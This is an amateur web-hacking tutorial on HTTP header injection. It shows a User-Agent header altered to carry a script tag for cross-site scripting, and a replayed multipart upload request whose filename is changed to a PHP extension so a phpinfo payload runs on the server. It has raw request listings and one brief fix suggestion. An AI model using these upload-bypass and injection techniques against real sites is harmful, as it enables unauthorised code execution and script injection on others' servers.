HTTP Header Injection

Full English document:

Author: Psiczn
Website: www. psiczn. uni. cc
Contact: Psiczn@gmail.com
Note: If you are going to post this little paper in some site please put the source and the author, this paper have copyright.
Well I was looking my Blogspot and I saw something very bad, all the post sucks there is no a good one, so I make the demo-to make a good one. first sorry if my English is not good Im constantly practice. OK lets start with this little paper, what do you think when you see a page with a upload option? Yes everybody think there is maybe a very nice bug for me.
There are different ways to bypass the upload, you can change the name of the file like this "file.php.jpg" but the majority of the administrators or webmasters fix that bug because is so popular. but we are gonna talk about the bypass in the headers, there are a lot of vulnerable pages and this is a bug of high risk.

First what is HTTP Headers: http://en.wikipedia.org/wiki/List_of_HTTP_headers

Well as you know we can change the response of the http headers, is like an injection here an example (to understand this or make a test in some page you can download one addon for Firefox, search for it "Live HTTP Headers") run the addon when you enter to google.com for example and
Look the response:
Host: google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml, application/xml, application/xhtml + xml, text/html; q = 0.9, text/plain; q = 0.8, image/png ,*/*; q = 0.5
Accept-Language: en-us, en; q = 0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1, UTF-8; q = 0.7, *; q = 0.7
Keep-Alive: 300
Connection: keep-alive

How many sites did you see with your ip and browser printed in the page? A lot! , And what with that right? You can change the headers and make a test of XSS (Cross Site Scripting), a lot of sites are vulnerable to this type of attacks because the webmasters doesnt know nothing about this bug; I dont remember exactly when but Astalavista some months ago was
Vulnerable to this type of attack-Http Header Injection. now when you have the response of the http headers logged in you addon live http headers click to the option "replay" and change the browser/user agent to this:
Host: google.com
User-Agent: <script> alert (/xss/) </script>
Accept: text/xml, application/xml, application/xhtml + xml, text/html; q = 0.9, text/plain; q = 0.8, image/png ,*/*; q = 0.5
Accept-Language: en-us, en; q = 0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1, UTF-8; q = 0.7, *; q = 0.7
Keep-Alive: 300
Connection: keep-alive

Well then just click again in "replay" and see the results of you http header injection, the 85% of the pages tested was vulnerable to this type of bug, so stay alert if you are going to program a website, how to fix this problem? Just use the htmlspecialchars (); function. Well that was something about XSS (Cross Site Scripting) but we are interested
In the bypass making a http header injection in one upload. Lets see the response of the headers when we upload an "image" with our code and all that stuff:
Host: www.webiste.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: 1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml, application/xml, application/xhtml + xml, text/html; q = 0.9, text/plain; q = 0.8, image/png ,*/*; q = 0.5
Accept-Language: en-us, en; q = 0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1, UTF-8; q = 0.7, *; q = 0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://website.com
Content-Type: multipart/form-data; boundary = --------------------------- 23864205337548
Content-Length: 322
----------------------------- 23864205337548
Content-Disposition: form-data; name = "userfile"; filename = "image.jpg"
Content-Type: image/jpeg
<? Php
Phpinfo ();
?>
----------------------------- 23864205337548
Content-Disposition: form-data; name = "submit"
Subir imagen
--------------------------- 23864205337548 --

Well there is my supposed image and the response of the http headers, there in the middle as you can see the PHP code, OK lets try something different we are going to change the name of the image to other extension for example. php (some sites are "patched" because they just dont allow the php extension but you can try with php5, php4, php.jpg, php.png, etc ):
Content-Disposition: form-data; name = "userfile"; filename = "image. php"
Content-Type: image/jpeg
<? Php
Phpinfo ();
?>
----------------------------- 23864205337548
Content-Disposition: form-data; name = "submit"
Subir imagen
--------------------------- 23864205337548 --

Just send the replay and lets see the results of the http header injection; we got an error of the send post, is too long. to quit that error just send again the replay but without this:
Content-Length: 322

If the upload is vulnerable you will see your code executed in the page when you click the link to see your supposed image. Well I hope you learn something new with this paper, Regards.